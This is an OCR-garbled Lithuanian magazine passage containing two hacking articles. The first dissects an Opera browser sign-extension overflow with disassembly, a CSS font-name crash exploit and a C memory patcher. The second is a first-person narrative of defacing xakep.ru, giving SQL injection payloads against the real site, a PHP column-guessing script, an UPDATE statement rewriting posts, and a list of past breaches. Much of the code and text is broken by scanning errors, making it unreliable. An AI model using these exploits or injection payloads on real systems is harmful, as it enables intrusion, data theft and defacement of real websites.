nebūna. Operoje ju taip pat pasitaiko. Paskutinė 
klaida buvo aptikta 2006 metų balandžio 13 
dieną, tada ją ištaisė, 0 po to ši problema buvo 


vel iškelta birželio 7, kadangi ji pasirodė besant 


Kur kas nmtesne, nei Ukėtasi 
Kalbu apie klasikinį ženklo perpildyma, kuris 
pastaruoju metu yra visų pasaulio hakerių taikik 


Ivje. Aptarkimė kitą koda 1 pabandykime jame 


surasti Kaidą: 


Paprasčiausia ženklo perpildymo atvejį demon 
struojantis pavyzdys 


demo singed overflowichar *s 


aprašome kintamuosius 
char bufiMAX Lt 


me eilutės ilgi 


len = strienis); 


Įeigu eilutė telpa i buferį, tuomet ją kopi 


juojame, 


priešingu atvej 
if (len MAX LEN) stmcpytbuf, s, len; else 


grąžiname klaida 


retum O; 
vienaip ar kilaip apdorojame eilutę 
printfi „*esin“,„buf) 


į 


yla toisin, 


Iš pirmo žvilgsnio Čia viskas paraš 


mes prieš eilutes kopijavimą | bufen kruopščiai 
patikiname jos !Igį, Tačiau čia kalbama api 
ženklo perpildyma. Kintamojo len Upas yra 
signed int (daugelyje kompiliatorių Int pagal 


nutylejimą yra su ženklu), o funkojos strnc 


prototipas atrodo šta 


strnepytchar "as 


char *sourco, unsigned Int count). 


Tarkim, eilutės s Ilgis viršija 2 Gb, tuomet kintamoji 


ton bitas bus priskirtas vienetui Ir Išraišk 


MAX LEN' bus teisinga, kadangį len — m 


obet koks neigiamas skaičius, Kaip žinia, Mažėsni 
už bet kokį teigiamą. Tuo pat metu funkcija strcpy 
len traktuoja kaip argumentą bė ženklo ir | buteri 


buf kopijuoja labai daug baitų 


Norint išvengti perpildymo, būtina aiškiai apibrėži 


kintamąjį len kaip Unsigned int, tačiau gamintoja 
apie tai visada pamiršta. Cia nė (simus ir Opera 
kūrėjai 

Taig Opera. Pasiimiime anglišką vorsiją 8.57 
bandykimė ją pakankint (www opera .comdow 


toad'index,dml?opsys = Windowsding > endver > B 
524platform + Windowsėiocal y). Tai paskutini 
pažeidžiama versija, Opera 8.54 šios Klaido 
au ištaisytos. Tiksliau šnekant, lyg Ir ištaisyti 


ita peržiūra su disasembieriu rodo, kad ter 


dar galima rasti ženklo sutyginmimą, todėl Leliei 


siaiškinti, kokie būtent pradiniai parametrai ga 


Tai reiškia, reikia sėsti Ir kap 


būti perpildy 
Pradėsime nuo to, kad byla opora,.exe supakuol 
su ASPack 


sekcijos „aspack, „adata, o PEIDE net nus 


rai matomo 


hex redaktoriuje 


pakuotuvo versija (2,12), Tačiau šios bylos «dydi 
yra viso labo 78 Kb, todėl joje negali būti miel 
cdomaus, 0 visas funkcionalumas sukauptas 

Mb dydžio bibliotekoje opera.dll, kuri taip p 
ASPai 


Kad nereiketų ieškoti veikiančio išpakuotuvo (nt 


supakuola 


visi jie moka išpakuoti dinaminės bibliotekas! 


pasinaudosime įrankiu PE-Tools ir gausime 0p- 
era.dl! turinį. Importo lentelė bus sugadinta, 
tačiau kam mums ji reikalinga?! Juk mes čia 
ruošiamės ne crack'ąa rašyti, o tyrinėti progra- 
mas saugumą. Svarbiausia, kad gautą rezultatą 
būtų galima užkrauti į !DA Pro arba hiew, 0 visa 
kita — technikos reikalas! 


Kadang pradinis įėjimo taško (dllentry) kodas 
bibliotekoje yra sugadintas, /DA Pro negali atpažinti 
kompiliatoriaus ir užkrauti signatūrų, todėl mes 
lkekame be bibhotekinių pavadinimų, kas žymiai 
apsunkina analizę. Beje, kompiliatorių galima nus 
tatyti 1 rankiniu būdu pagal tekstines eilutes, kunos 
paliktos atsižvelgiant | autonnes teises. Bibliotekos 
turinio peržiūra su hiew mums car kartą patvirtina, 
kad Opera buvo sukompiliuota ne su kuo kitu, O 
su Microsoft Visual C+ +. 


Tiessog opera.dll bibliotekoje reikia allikti tekstinių 
eilučių paiešką, kas leidžia lengvai Ir greitai nus- 
tatyti kompikatorių, 

Telioka užkrauti atutinkamas signatūras. Tai 
daroma taip: File IDA Pro meniu pasirenkame 
punktą Load file - FLIRT signature file, pateik 
tame tunmų signatūrų sąraše surandame eilutę 
„vc32rtf Microsoft VisualC 2 7/net runtime“ Ir 
spaudžiame <Enter>. Štai dabar su šia byla iš 
tiesų galima dirbti! 


Kaip surasti potencialias ženklo perpildymo 
wetas? Yra daugybė kelių. Pavyzdžiui, galima 
eškoti visų komandų JL, JLE arba (jeigu 
tokių komandų bus pėr daug) perrinkti visus 
su eilutėmis dirbančių funkcijų (tokių, kaip 
strien, stropy, wcsncpy) iškvietimus, atkreipiant 
dėmesį | tas, šalia kurių yra lyginamas (kartu 
su ženklu) kopijuojamos eilutės Ilgis. Tai Jau 
beveik perpildymas! „Beveik“, kadangi norint 
atikt ataką, šiuos duomenis reikia kažkaip 
susieti su vartotojo įvedamais duomenimis, 0 
Šie pakeliui nebūtų niekur apkarpomi. Iš esmės 
šią užduoųį galima automatizuoti parašius 
specialų skriptą, tačiau tokio kodo sukūrimas 
truktų gana ilgai, kadangi tektų įvertinti labai 
daug situacijų. Taigi „rankinis“ darbas šiuo 
atveju yra efektyvesnis. 

Austrų kompanijoje SEC Consult Unterneh- 
mensberatung GmbH dirbantis Bernhard Mueller 
surado vieną tokią vietą (apie ką ir raportavo 
Opera kūrėjams, kurie tuojau pat pataise 8.54 
9.0 versiją). Bet programoje kaip Ir 
anksčiau yra daug panašaus tipo klaidų, kurios 
laukia savo hakerio, todel praverstų Iš arčiau 
lėti į jau Užtaisylą skylę. 


Ir einamą 


Disasembliuotas pažeidžiamos funkcijos 12k vul- 
nerably listingas su pažįstamu perpildymu 
124 vulnerably proc near 


arg sc = dword ptr 4 

arg len > dword pir 8 

mov eax, dAword 67F9EFGO ; pObj 

push ebx ; išsaugom ebx 

push es! ; Išsaugom esi 

saugom edi 

mov ed, |esp+0Ch +arg len] : edi := arg len 
mov esi, įeax + 40h] ; pDestination 

cmp edi, 1000h ; patikriname arg len ilgį 
nov eta, eCx ; this call 

I short loc 67B8CF1C ; see! over here! 
mov edi, OFFFh ; arg len „sutrumpinimas“ 


push 6di ; 


oc 6/B8CF1C: 
push edi ; size I 
push /esp + 10h+arg src] ; wchar t * 


wchar L * 


push esi ; 
call wesnepy ; kopiluojame šrifto pavadinimą 
md word ptr [esi +edi*2],0 ; Įterpiame užbaigiant 


i] 


xa esp, OCh ; Išstumiame argumentus 


mov eCx, ebx ; this call 

push esi : nukopijuotas arg len 

call sub 67B8CD10 ; apdorojame šrifto 
pavadinima 

test ax, ax ; viskas Ok? 

įigė short loc 67B8CF48 ; gauname handie 

mov ecx, [ebx+5DOh] ; klaidos apdorotojas 

call sub 67B8C7BC ; eax := [ecx] 

inc eax ; eax+- 


loc 67B8CF48: 

pop edi ; atstatome edi 

pop esi ; atstatome edi 

pop ebx ; atstatome ebx 

retn 8: išstumiame argumentus 


Kaip matome, ši procedūra (pavadinkime ją 
n2k vulnerably) gauna du argumentus: rodyklę 

eilutę ir šios eilutės Ilgį, kuris po to sulyginamas 
naudojant ženklo operaciją su konstanta 1000h, 
todel leistinas eilutės ilgio diapazonas yra lygus 
[0, 1000h) ir (7FFFFFFFh, FFFFFFFFh]. Po to Ši 
eilutė kopijuojama į kažkokią struktūrą (greičiausiai 
tai objektas, kadangi listinge galime matyti this 
call tipo iškvietimus!, kuri perduodama apdoroti 
funkcijai sub 6788CD10. 

Akivaizdu, kad perdavę 2 Gb ar didesnio dydžio 
eilutę, mes ištrinsimė gerą pusę programos 
adresų erdves, nuo ko jai pasidarys labai neg. 
era, Geriausiu atveju viskas pasibaigs lūžimu, o 
blogiausiu shell kodo perdavimu ir valdymo 
užgrobimu. Tiesa, perduoti tokią ilgą eilutę tinklu 
labai keblu. Net jeigu auka prisijungusi per DSL, 
ataka truks keletą valandų, todėl vartotojas 
greičiausiai uždarys Operą arba susijungimas bus 
uždarytas dėl timeout'o. 

Hakernų laimei. Operos kūrėjai padarė dviguba 
klaidą, praplėsdami žodį iki dvigubo žodžio. 
Savaime suprantama, su žonkiu. Kaip g bė jo! 
Tiesą sakant, už gamintojus tai padarė kompili 
atorius -— jie viso labo panaudojo neteisingą UpU 
pakeitimą, tačiau Operos vartotojams nuo t0 nė 
kiek ne geriau. Beje, šis tipų pakeitimas atliekamas 
funkcijoje, iškviečiančioje 12k vulnerably! Žemiau 
pateiktas esminis jos fragmentas su tam tikrais 
sutrumpinimais: 


Funkciją n2k vulnerably iškviečianus ir jai vietoje 
arg len žodį su ženklu (prapiestą iki dvigubo žodžio 
su ženklu!) perduodantis pažeidžiamas kodas 

loc 67B8AF5D: 

mov [esi -2Ch], eax 

Įmp short loc 67B8AF78 


loc 67B8AF62: 
movsx eax, [ebD+ var length ovil) 


; štai jis! kopijuojamos eilutės Ilgi saugančio 

; žodžio praplėtimas iki dvigubo žodžio su ženklu 
; Jeigu eilutės ilgis viršija 7FFFh baitus 

; tal ir rezultatas viršija 7FFFFFFFh 


push dword ptr [esi +8] ; perduodame arg src 
mov ecx, dword 67F9EF18 ; this 

lea eax, Įebp+var 250) ; gauname arg len 
push eax ; perduodame arg len 

call n2k vulnerably ; iškviečiame funkciją 


Funkcijos kodas pakankamai gremėzdiškas. 
todėl čia jis pateiktas ne visas, O būtent čia 
nepakliuvo praplesto EAX perdavimas | kintamąjį 
[EBP +var+ 250], tačiau pats faktas, jog jis por 
duodamas, perpildomos eilutės ilgį sutrumpina 
iki viso labo 8000h baitų arba 32 Kb, kas visiškai 
priimtina atakuojant. 

Telieka išsiaiškinti, kas g tai per eilutė Ir kaip ji 
susijusi su vartotojo įvedamais duomenimis (ir ar 
Iš VISO || SU jais susijus:), Atsakymą pateikia Iš n2k 

vulnerably iškviečiama funkcija sub 6788CD010. 
Štai disasembliuotas jos tekstas: 

2 perpildanti eilutė perduodama šriftus 


: apdorojančiai funkcijai. Tai leidžia manyti, 
; kad eilutėje saugomas šrifto pavadinimas 


sub 67B8CD10 proc near 


push Iesp+0Ch+arg O) 

; į sub 67B8CC38 perduodame „savo“ 
argumentą 

call sub 67B8CC38 


; subfunkcijos sub 67B8CC38 disasm listingas 
sub 67B8CC38 proc near 


arg O = dword ptr 8 

push esi 

mov esi, [esp +arg O) 

push offset aSerif ; „SERIF“ 
push esi 

call sub 67C2FC85 ; šrifto apdorojimas 
pop ecx 

test eax, eax 

pop 6Cx 

Iz short loc 67B8CC52 

XO/ eaX, EAX 

pop esi 

retn 


loc 67B8CC52: 

push offset aSansSerif O; „SANS-SERIF“ 
push esi 

call sub 67C2FC85 ; šrifto apdorojimas 
pop ECx 

test Cax, cax 

DOD eCx 

Įz short Ioc 67B8CC68 

push 1 


loc 67B8CC65; 
pop cax 

pop esi 

retn 


loc 67B8CC68; 

push offset aFantasy ; „FANTASY“ 
push esi 

call sub 67C2FC85; 


| akis 18 karto krenta šriftų pavadinimai. Aha! 
Vadinasi, ši funkcija valdo puslapio apiforminimo 
stilių, užkraudama atitinkamą šriftą. Tai labai ge- 
rai, kadangi šriftus mes galime priverstinai keisti 
per CSS. Svarbiausia, kad šrifto pavadinimo ilgis 
(nebūtina, kad jis iš vesų egzistuotų, čia galima 
įvesti ir fiktyvų pavadinimą) viršytų 32 Kb. Kartu 
su pavadinimu gali būt perduotas shell kodas, 
kurs pradės apdoroti heap (dinaminę atmintį) 
ir visiškai ją ištrins. O heap perpildymo techniką 
mes jau ne kartą aplannėjome ankstesniuose 
„Hakerio“ numenuose. 

Žemiau pateiktas paprasčiausio eksploito kodas, 
„nulaužiantus“ Opera 8.52 1 ankstesnes versijas 
(tesa, ši ataka gali nesuveikti, jeigu atjungtas 
CSS apdorojimas): 
<STYLĖ type-text/css 
35000x4) </STVLE 


»A į FONT-FAMILY: 


Tai paprasčiausio CSS eksploito kodas, sukeliantis 
Operos lūžima, Norint likviduoti pažeidžiamumą, 
reikia parsisiųsti naują Opera versiją arba užtaisyti 
skylę savomis rankomis! Iš Uuesų, kam per 
modemą siųstis keletą megabaitų, kažką iš naujo 
įdieginėti ir t.t., kai mus kuo puikiausiai tenkina ir 
dabartinė versija? Kaip žinia, su kiekviena nauja 
versija programinė iranga vis pučiasi ir pučiasi, 
tampa nepaslanki, tačiau nesuteikia jokių iš 
esmes naujų savybių. O juk mums viso labo reikia 
pakeist 6788CF15: JL Ioc 6788CF1C (7Ch O5h) 
i JB Ioc 67B8CF1C (72h O5h). Jeigu byta būtų 
nesupakuota, tai būtų galima padaryti tiesiog, su 
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hiew, o dabar... deja. Žinoma, visiškai įmanoma 
išpakuoti opera.dll, juo labiau, kad ASPack yra 
gana žinomas pakuotuvas, tačiau Išpakavimas ne 
visada baigiasi sėkmingai, todėl po jo skirtingose 
vietose pradeda rodytis klaidos. 

Mes eisime kitu keliu, Ly. pasinaudosime on-line 
pataisymu: paleisimė 0pera.exe, palauksime, kol 
šis išpakuos opera.dli Ir pataisysime reikiamus 
baitus tiesiog operatyvinoje atmintyje! Analogiškas 
metodas gali būti panaudotas ir su kitomis 
programomis, ne tik su Opera, todėl žemiau 
pateikiamas paprasčiausio universalaus on-line 
patcher'io išeities tekstas, 


On-line patcher'io opera loader.c išeities tekstas 
Ainclude <stdio.h> 
tinclude < windows.h > 
*define MAX SIZE 16 
buferio dydis 

mainiint arge, char **argv) 


t 


pataisymui skirtas 


deklaruojame kintamuosius 
STARTUPINFO si; PROCESS INFORMATION pi; 
DWORD N.FL; 
vykdomos bylos pavadinimas 
unsigned char name[]= "opera.exe"; 
unsigned char bufiMAX SIZE|; 
parodome, ką ir kur mes taisysimė 
unsigned char Įmp fromį] „Kx7ChxO5h“; 
old 
unsigned char įmp tol] = „724490“; // new 
void* įmp off (vold*)0x67B8CF1C; / ad 
dress 
printfi loading ė patching...In“); 
visų duomenų struktūrų inicializacija 
si.cb = sizeofisij; memset(ėsi,O,sizeofisi)); 
memsetibuf,O.MAX SIZE); 
paleidžiamė opera ir paprastumo dėlei 
neperduodame komandinės ellutės 
argumentų 
CreateProcess(O, name, 0, 0, 0, NORMAI PRI 
ORITY CLASS, O, O, ėsi, ėpil; 
palaukiame 1 sekundę, per kurią turėtų būti 
užkrauta ir išpakuota biblioteka opera.dll. 
Gali būti, kad Iėtesniuose kompiuteriuose 
šią reikšmę teks padidinti 
Sieepi100C 
prieš pataisymą patikriname operos versiją 
ReadProcessMemorytpi.hProcess, įmo off, but. 
strienijmp from), 4N); 
if (N != strienijmp from)) 
Įprintti„„ERR:reading memoryix7 in“: retum 
-1;) 
If istrompijmp from, but) 
Įprintfi„„ERR:incorrect version! x 7“ Kretum 
1:) 
pataisome sąlyginį ženklo perėjimą JL. 
į beženkli JB 
WriteProcessMemorytpi.hProcess, įmp off, 
įmp. to, strienijmp to), ėN); 
MN 1 strienijmp tol) 
Įprintfi„-ERR:writing memoryix7in"Kretum -1;) 
Sakome OK Ir dingstam 
printfi „Okinall ok in“); 


' 


Savaime suprantama, dabar kiekvieną kartą teks 
paleidinėti ne opera,exe, o opera loader.oxe. 
Beje, kad nereikėtų pėr daug kankintis, pakanka 
viso labo pakeisti nuorodas (shortouts) ir bylų 
praplėtimų sąsajas. Tiesa, dėl konstrukcinių on 
line pateher'io ypatumų Jis Operai neperdavinėja 
komandinės eilutės argumentų, todėl jeigu JI 
įdiegta kaip naršyklė pagal nutylėjimą, htmi bylos 
su ja neatsidarinės! Naudokite drag-n- drop 
arba pataisykite patcher'į. Svarbiausia, kad šią 
skylę mes užtaisėmeė savomis jėgomis Ir mums 
nepnreikė jokių atnaujinimų. 


SOFTWARE FERRUM 


IMPLANT 


HACK 
Mini 


UNIXOID 


(G 


CODIN 
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030 


Kaip apmovė mūsų kolegas 
Visos paskutinio „xakep.ru“ defeiso detalės 

MES DAUG RAŠOME APIE ĮVAIRIUS NULAUŽIMUS IR | 
DAŽNAI STEBIMĖS BUKOKAIS PROGRAMUOTOJAIS IR 
NEGABIAIS ADMINAIS. TAČIAU KARTKARTĖMIS MUMS 
PATIEMS IR MŪSŲ ARTIMIEMS KOLEGOMS SKAUDŽIAI „i 
TRINKTELI PER NOSĮ: NESENIAI DU NIEKŠAI DEFEISI- 73 
NO MŪSŲ KOLEGŲ ŽURNALO SVETAINĘ. GĖDINTIS 
ČIA NĖRA KO: TEGU PAPASAKOJA, KAIP VISKAS VYKO. 

MES JUOS SURADOME IR PAPRAŠĖME PARAŠYTI 
STRAIPSN]. 


> 


Xakep.ru puslapiuose galima surasti nulaužimų veidrodžius. Pa- 
prastai ten būna menkai žinomos skriptvaikių nulaužtos svetainės. 
Aš nusprendžiau šiek tiek pataisyti šią situacija Ir čia išsaugoti 
paties hakerio nulaužimo veidrodį — tai sukeltų daug triukšmo. 
Pasakyta — padaryta. Iš anksto noriu padėkoti savo bičiuliui 
Zadoxlik'ui: jis man daug padėjo vykdant šį blogio aktą. 


[Greita paciento apžiūra) Peržiūrėjęs svetainės varikliuką aš 
supratau, kad susidūriau su savadarbiu gameland programuotojų 
darbu. Prisipažinsiu, manęs tai nė kiek nenustebino, priešingai, 
tai dar labiau paskatino tolimesnius mano tyrimus. Visi tie public 
sploitai mane taip užkniso, kad darbas su „juoda dėže“ man teikė 
vien tik malonumą. Čia jau reikėjo turėti įgūdžių. Visų pirma aš 
nuspaudžiau nuorodą „straipsniai“. Bakstelėjęs pirmą pasitaikiusią 
nuorodą, aš pakliuvau į www.xakep.ru/post/28039/default.asp. 
Aišku, visose svetainėje pateiktų straipsnių nuorodose keičiasi tik 
šis penkiaženklis skaičius. O ką daryti, jeigu šis parametras nėra 
filtruojamas. Vietoje skaičiaus įrašęs magišką žodį „lala“, aš gavau 
vidinę serverio klaidą (tai http atsakymas, kurio kodas 500): 


The system canno! find the path specified. 


Deja, tolimesnės manipuliacijos su šia reikšme nieko gero nedavė, 
todėl aš paspaudžiau backspace ir sugrižau atgal. Kažkas mane 
pastūmėjo peržiūrėti straipsnių archyvą. Aš įsižiūrėjau į perduodamą 
kintamąjį ir nustebau, jog adrese www.xakep.ru/articles/common/ 
archive.asp?tosearch=theme?620like9620'*zEDITORZ*"?6420and?6 
20theme?620like?620'*zINFOz** panaudotoje reikšmėje tosearch 
buvo loginė išraiška. Anksčiau aš tokio dalyko niekada nemačiau ir 
pabandžiau vietoje tosearch reikšmės perduoti (1=1) — serveris 
man grąžino puslapį su visais įrašais. Įterpęs (2-1), aš pamačiau 
užrašą: „Nėra duomenų“. Jau tikėjausi, kad ši reikšmė bukai per- 
duodama kaip SOL užklausa, tačiau po to, kai pabandžiau perduoti 
(1=/**/1) ir duomenų vėl nebuvo, man teko nusivilti. Pagalvok, 
Juk komentarai /*KOMENTARAS*/ - tai praktiškai SOL standartas: 
juos galima naudoti tiek MySOL, tiek ir MSSOL bei PostgreSOL 
sistemose. Pirmos mažos pergalės sukeltas džiaugsmas beveik 
susuko galvą. Važiuojam toliau. 


[Pirma rimta klaida] Kuomet aš grižau prie publikacijų sąrašo, 
mane sudomino komandos GHC konkursas. Nusprendžiau šiek 
tiek atitrūkti ir ėmiausi šio konkurso — po pusvalandžio gavau 
priėjimą prie administravimo, tačiau forume pasirodė žinutė apie 
tai, kad konkursas baigtas. Gaila, kad visko nepradėjau anksčiau. 
Norėjau palikti atsiliepimą į straipsnį, tačiau vėl nusprendžiau 
patikrinti parametrus ir jų atsparumą SOL injekcijai — man tai 
pavyko. Kai nuspaudžiau mygtuką „Palikti savo nuomonę“, man 
kartu su pranešimu pasiūlė įvesti vartotojo vardą ir slaptažodį. 
Užsiregistravęs vardu „xaxa“ su slaptažodžiu 12345, aš palikau 
savo atsiliepimą. Peržiūrėjęs savo pranešimą, dešinėje pamačiau 
du mygtukus: EDIT ir DELETE. Užvedęs kursorių ant mygtuko 
EDIT, aš pamačiau, kad visi reikiami parametrai perduodami GET 
metodu. Ką gi, pažiūrėsime. Gavau savybes, nukopijavau adresą 
ir visur pridėliojau kabučių. Vietoje atsakymo gavau dar vieną 
klaidą su kodu 500. | tą patį puslapį užėjęs su FireFox (IE skaito 
tik puslapius su kodu 200), aš pamačiau užrašą „The page can- 
not be displayed“. 

Kai aš pašalinau visas kabutes, prieš mano akis pasirodė puslapis 
su registracijos metu įvestu elektroninio pašto adresu ir pranešimu, 
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2001 
Gruodis 
Bagzis nulaužė elektrohakerį — elektroninės mūsų kolegų 
žurnalo versijos platinimo projektą. Tai mus pastūmėjo 
išaiškinti dar keletą PDF apsaugos klaidų. Pagarba, brolau! 


2002 

Liepa 
Oficiali versija: ilgai pas mus paštui ir kitiems dalykams 

buvo naudojami skaitmeniniai slaptažodžiai. Vienas 
žmogėnas tai išsiaiškino ir parinko epsilon'o vartotojo 
slaptažodį, po ko defeisino svetainę. 
Neoficiali versija: epsilon įstojo į vieną hakerių komandą 
ir nusprendė su draugeliais išgarsėti, nudefeisindamas 
svetainę su savo vartotoju. 


31] 


2002 
Spalis 
Panaudodamas paprasčiausią saugumo skenerį, partizanas 
iš Baltarusijos svetainėje rado įdiegtą piranha sistemą. 
Pasinaudojęs standartiniu vartotojo vardu ir slaptažodžiu 
jaunuolis daug pasiekė. 


2003 
Balandis 
Nežinomi jaunuoliai nugvelbė didelę duomenų bazę su 
visais mūsų web pašto vartotojų duomenimis. Ji iki šiol 
prieinama čia: www.securitylab.ru/ tools/xakOp ru.zip. 
Tiesa, tai ne visai xakep.ru nulaužimas, kadangi visas pašto 
paslaugas mes teikėme ne patys, o nuomojomės jas iš 
vienos web paštu besiverčiančios kompanijos. 


2003 
Gegužė 
Bagzis vėl nulaužė mūsų svetainę, šį kartą per SOL-injec- 
tion. Jis iškabino defeisą: „Defaced by Arvi the Hacker, 
vaikinai, su šventėm!“. Visa tai vyko gegužės 9 dieną. 
Dviguba pagarba! 


2004 
Liepa 
Pasinaudoję CSS klaida, vaikinai iš MadFuckerz „padarė“ 
mūsų chatą ir pasityčiojo iš admino. Po to mes supratome, 
kad laikas užsiimti chato tobulinimu :). 


2006 
Gruodis 
Mūsų programuotojai ne visai tobulai pataisė chatą, todėl 
po pusantrų metų jiems teko dribti veidu į purvą. Dėl 
idiotiškos savadarbio web serverio klaidos nulaužtas chat. 


xakep.ru. 8 

2006 8 

Kovas - 

Vaikinas slapyvardžiu ZaCo dėl SOL-injection klaidos de- ž 
feisino mūsų svetainę. - 

Ž 
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kurį reikėjo redaguoti. Tuo pačiu naršyklės adreso eilutėje esanti 
nuoroda atrodė taip: 


wviw-xūkep.tu/code/common/rateit/opinion  new.asp?code opinion ORT1160468code. rat 
6— RRT175481 8backto http://www xakep.tu/post/30242/default.asp 


Visiškai aišku, kad parametre code opinion saugomas pranešimo 
identifikatorius. Akivaizdu, kad jame perduodama eilutė, todėl aš iš 
pradžių įterpiau ORT116046'--, Kaip ir reikėjo tikėtis, užklausa buvo 
įvykdyta be klaidų. Pratęsdamas savo ieškojimus aš nusprendžiau 
įterpti ORT116046'962b', kur 962b — šešioliktainis „+“ ženklo 
kodas. Dabar galima su 8096 tikimybe sakyti, kad šis parametras 
pažeidžiamas SOL-injection atakai. Pamėginkime įterpti tokią 
eilutę: ORT116046'and(1=1). Šį kartą viskas buvo padaryta 
be sutrikimų. Į code opinion įterpęs ORT116046'and(2=1), aš 
pamačiau užrašą: „Tokios nuomonės nerasta“. 

Puiku! Parametras iš tiesų nėra filtruojamas! Tačiau ar jį galima 
panaudoti pilnavertei atakai? 


[Duomenų surinkimas] Laiku nustačius SOL serverio versiją, galima 
sutaupyti labai daug brangaus laiko, todėl dabar užsiimkime būtent 
tuo. Sprendžiant iš praplėtimo asp galima spėti, kad serveris veikia val- 
domas Windows sistemos. Be abejo, visa tai galima lengvai suklastoti, 
tačiau http atsakyme galima pastebėti tokią eilutę: Server=Microsoft- 
IIS/6.0, kas patvirtino mano spėjimą. Taip pat buvo visiškai akivaizdu, 
kad šiame projekte vietoje DB serverio naudojama MSSOL sistema (aš 
tai supratau eksperimentuodamas su užklausomis: čia buvo vykdomas 
operatorius TOP kurį atpažįsta tik MSSOL). Dabar buvo pats laikas 
gauti mane dominančių lentelių ir jas atitinkančių stulpelių sąrašą. 
Gerai, kad mes susidūrėme su MSSOL: gauti visus mums reikalingus 
duomenis bus nesunku — tereikia įvykdyti gražų UNION SELECT. Aš 
tingėjau su copy/paste parinkti stulpelių kiekį, todėl parašiau mažytį 
php skriptą: 


< php 

tor(Si - 05 < 30,51 + = ) 

( 

[Kai kurie naudingi MSSOL dalykėliai] 


Lentelėje information schema.columns saugojama in- 
formacija apie serverio stulpelius. Patys naudingiausi 
stulpeliai yra table name ir column name. Stulpelyje 
column name saugojamas stulpelio pavadinimas, o ta- 
ble name — atitinkamos lentelės pavadinimas. Panaudojus 
šią informaciją, be didelio vargo galima sužinoti visų lentelių 
pavadinimus. Jeigu tu žinai duomenų bazių pavadinimus, 
tai gauti jų struktūrą galima taip: PAVADINIMAS.informa- 
tion schema.columns. Sužinoti einamos duomenų bazės 
pavadinimą galima su funkcija db name(), o vartotoją, kurio 
vardu veikia serveris — su USER(). Po to, jeigu pasiseks, 
galima iš kokios nors lentelės gauti šio vartotojo slaptažodį 
ir pamėginti prisijungti prie duomenų bazės. Jeigu kabučių 
naudoti negalima (aktyviai filtravimu užsiimantis serveris dėl 
jų keikiasi), o eilutę būtinai reikia perduoti, tai pamėgink 
pasinaudoti funkcija bin2hex($s) — ji grąžins šešioliktainę 
eilutės, kurią reikia įterpti be kabučių, reikšmę, pavyzdžiui, 
?id=0x65696c757465, kur 65696c757465 — tai funk- 
cijos bin2hex(,eilute') grąžinta reikšmė. 
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ANorun: 
e-mail: 
Coo06ųenne lgtproperties 


Ormena | OrnpasuTė | 


'1/ gauname lentelių pavadinimus 


Ss=6ET  http://www.xakep.ru/code/common/rateit/opinion new.asp?code 
opinion = ORT116046V3620UNION0620SELECT0620" null str repeat( „null, Si)/-- HTP/LO“; 

S fsockopen(„xakep.ru“, 80); // adresas ir portas (80) 

write(Sf,Šs./ AINA“); 

Šget= Igeis($f,12); 

ifsubstr(Šget,9,3)! 500') echo(Šs),break; ) 

Idose(Sf); // uždarom 


) 
> 


Trumpai paaiškinu: skriptas perrinkinėja null'us tol, kol užklausa 
vykdoma be klaidos, t.y. mes nematome užrašo: „Vidinė serverio 
klaida“ (Internal server error). Mane nustebino tai, kad ilgai laukti 
nereikėjo: pradiniame SELECT'e buvo viso labo aštuoni stulpeliai. Ką 
gi, iki pergalės liko jau nedaug. Naršyklės adreso eilutėje įrašęs 


www.xakep.1u/coda/common/rateit/opinion  new.asp?code opinion ORT116046' UNION 
SELECT null,null,null,null,null,null,db name(),null--, 


aš gavau duomenų bazės pavadinimą (www), kurioje buvo vykdoma 
ši užklausa. Jau buvo aišku, kad prie forumo ir kitų gerų dalykėlių 
aš neprisikasiu, tačiau ir tai jau šioks toks rezultatas. Dabar reikia 
gauti visas lenteles kartu su jų turiniu: 


www.xakop.tu/code/common/rateit/opinion new.asp?code opinion ORT116046" UNION 
SELECT null,null,null,null,null,null table name,null from information schema.columns-- 


Taip aš gavau duomenų bazės pirmos lentelės pavadinimą. To- 
liau: 


MHEHME 


/2/ preview iš naujienos 


+ [epoaM mMeva 4 Mai V. IpPGYPICA DeAG4K106 

Cpouko TPEŠYSTCA rMaBHeit pEAAKTOP CNe4. BbiNyCK 3 XYDHANa 
«CTp3Ha Mrp», noceau;eHKHOMY KynbTOBOK Mrpe «< epO0H MeUa H MarKM 
Vv. Tpe0osanma - Gezynpeunoe 3HaHKne BCeK Cep, MBHOCTb, 
OTB6TCTBEHHOCTb, CNOCOGHOCTE MEHSAXEPHTE KOMAHĄ 4-5 Uen... 


lala 
lala.. 


+ (IpaiAnsk Magic The Gatheriną O Porte 
Mexav TO0OM M NDOTHBHKMKOM — BOCEMbAECAT CaKTHMETDOB MrDOBOrOo 
3: atnaujiname publikaciją 


www. xakap.ru/code/common/tateit/opinion new.asp?code opinion ORT116046“  UNION 
SELECT null,null,null,null,null,null,table name,null from information: schema.columns where 
toble name not in („dtproperties')-- 


Analogiškai aš gavau visą sąrašą, tačiau mane domino tik lentelė 
wpPost, kurioje buvo saugoma informacija apie publikacijas. Jeigu 
tu dar nesupratai, kam man reikia būtent šios lentelės, tai pasikar- 
tosiu: mano tikslas buvo defeisas, o default.asp puslapyje visada 
pateikiama trumpa informacija apie naują straipsnį, t.y. jeigu aš 
jame padarysiu pakeitimą, tai jau bus defeisas. Be abejo, buvo 
galima įvykdyti exec ir persiusti shellą, tačiau aš tam neturėjau 
reikiamų teisių, todėl pirmasis variantas atrodė patraukliausiai. 
Analogiškai veikdamas aš gavau reikiamus stulpelių (column 
name) pavadinimus; 


filedir, preview, title, scope. 


filedir -— kažkas panašaus į publikacijos ID, preview — išankstinei 
peržiūrai skirtas publikacijos tekstas, title — antraštė, scope — gana 
idomus stulpelis. Esmė tame, kad xakep.ru ir gameland.ru veikia 
vienoje mašinoje ir naudoja vieną DB, todėl norint kažkaip atskirti, 
kas ir kur turi būti, buvo pridėtas šis parametras. Svarbiausia — jame 
yra eilutė „xpOSt“. 


[Deface time] Norėdamas įgyvendinti savo sumanymą turėjau į 
stulpelį preview įrašyti reikiamą HTML kodą ir taip atlikti defeisą. 
Vis dėlto mūsų darbe niekada nereikia skubėti, todėl iš pradžių aš 
nusprendžiau šiek tiek paeksperimentuoti. Norėdamas patikrinti 
savo spėjimą, aš archyvo sąraše suradau į akis nekrentantį straipsnį 
ir atnaujinau jo preview: 


brtp://www.xakep.ru/code/ 
tommon/roteit/opinion new. 
osp?code. opinion ORT116046'; 
UPDATE wpPost SET preview "lala" 
where liledir 28410 and 
scope — "Xpost'-- 


Toliau: 
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Finale redaguojamo pranešimo įvedimo lauke aš gavau 
„lala“, kas byloja apie tai, jog viskas atlikta sėkmingai. 
Tačiau paaiškėjo, kad klydau. Tą patį archyvą atsidaręs 
